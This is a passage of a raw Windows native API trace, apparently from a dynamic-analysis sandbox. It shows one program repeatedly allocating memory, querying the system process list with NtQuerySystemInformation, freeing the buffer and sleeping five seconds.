ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.417] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.426] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.435] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.446] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.455] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.464] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.475] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.483] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.493] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.502] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.511] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.522] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.531] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.540] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.551] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.560] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.569] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.578] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.587] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.595] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, 